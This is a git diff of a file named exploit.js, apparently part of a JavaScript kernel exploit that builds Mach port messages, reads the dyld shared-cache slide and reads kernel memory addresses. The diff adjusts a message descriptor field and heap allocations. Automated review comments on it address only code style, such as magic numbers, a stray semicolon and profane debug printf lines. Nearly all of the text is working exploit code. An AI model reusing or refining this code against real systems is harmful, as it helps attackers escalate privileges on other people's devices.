Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js7
1 files changed, 3 insertions, 4 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 473bc6e..6a48f23 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, 0x0213c600);
+ write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
write_u32(InP + 0x30, fake_count);
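Review bot: The rewritten `write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)))` line swaps one opaque literal for a half-named expression: the descriptor type now has a symbolic name, but the `19` it is combined with is still a bare magic number with no comment saying what it counts. A named `const` declared beside `MACH_MSG_OOL_PORTS_DESCRIPTOR`, or at minimum a trailing comment on this line stating the field it fills, would finish the readability improvement the commit starts. The surrounding `r3gister` body begins before this hunk, so the constant's natural home is outside the visible lines.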
@@ -349,10 +349,8 @@ function r3gister(task, init_port_set, real_count, fake_count) {
function mach_ports_lookup_shit() {
printf("fuck\n");
var arrz = shit_heap(4);
- var arrz2 = shit_heap(4);
printf("fuck\n");
- write_u32(arrz, arrz2);
- write_u32(arrz2, 0);
+ write_u32(arrz, 0);
printf("fuck\n");
var sz = shit_heap(4);;
printf("fuck\n");
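Review bot: The new `write_u32(arrz, 0);` is immediately followed by the context line `var sz = shit_heap(4);;`, whose stray second semicolon is an empty statement that a linter would flag; since this hunk already touches the neighbouring lines it is the place to drop it. The four identical `printf("fuck\n")` traces around the change also give no indication of which step was reached, so a distinct message per step (or removing the ones that are no longer useful) would make the trace output actually locate a failure. `mach_ports_lookup_shit` continues past the end of this hunk.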
@@ -365,6 +363,7 @@ function mach_ports_lookup_shit() {
printf("mpl success\n");
return read_u32(read_u32(arrz) + 8);
+// return 0x42603;
}
var kernel_task_addr = 0;